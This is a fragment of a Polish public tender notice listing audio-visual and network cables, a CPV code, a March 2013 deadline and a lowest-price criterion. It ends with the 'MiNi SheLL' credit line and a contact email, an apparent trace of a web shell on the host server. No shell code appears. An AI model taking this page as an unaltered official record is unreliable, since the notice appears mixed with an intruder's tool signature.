-kabel głośnikowy - 30 mb,
-kabel HDMi - 35 mb,
-kabel Dvi-I-20 mb,
-kabel D-SUB 20 mb,
-kabel LAN - 20 mb,
-kabel zasilający - 15 mb,
-listwa zasilająca 5 gniazd z uziemieniem x2,
-kabel RCA Cinch - 12 mb.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 32.32.00.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.03.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com